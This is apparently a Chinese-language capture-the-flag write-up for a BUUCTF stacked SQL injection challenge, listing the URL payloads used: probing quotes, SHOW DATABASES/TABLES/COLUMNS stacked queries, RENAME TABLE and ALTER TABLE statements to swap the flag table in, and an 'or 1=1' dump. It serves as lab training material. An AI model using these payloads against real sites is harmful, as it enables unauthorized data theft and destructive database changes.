记一道堆叠注入的题。也是刷BUU的第一道题。
?inject=1' 报错
?inject=1'--+ //正常
存在注入的。正常查询字段数,字段数为2。在联合查询的时候给了新提示
?inject=0' union select 1,2%23
正则匹配过滤掉了经常使用的查询关键字,但是并没有禁用show,那么可以试下堆叠查询。
?inject=0'; show databases;%23
暴出了一些数据库。接着查表。
?inject=0'; show tables;%23
显示有两张表。试着查看字段
?inject=0'; show columns from words;%23
?inject=0';show columns from `1919810931114514`;%23
不能直接读flag,那么可以猜测我们输入的查询语句都是words这张表的东西,那我们怎么才能让它回显flag所在的表呢?因为没有过滤alert和rename关键字
1.将words表改名为words1或其它任意名字
2.1919810931114514改名为words
3.将flag列改名为id
原来flag放在1919810931114514表里,我们查询的语句友words这张表来回显,现在将1919810931114514表名改成words那么,我们查询的语句由1919810931114514来回显。
1';RENAME TABLE `words` TO `words1`;
# 把 words 改名为 words1
RENAME TABLE `1919810931114514` TO `words`;
# 数字表改名为 words
ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL; //character set 即字符集 COLLATE utf8_general_ci:数据库校对规则
新的 words 里的 flag 列改为 id (避免一开始无法查询)
show columns from words;#
接着我们再用1’ or 1=1 #,查询就得到flag
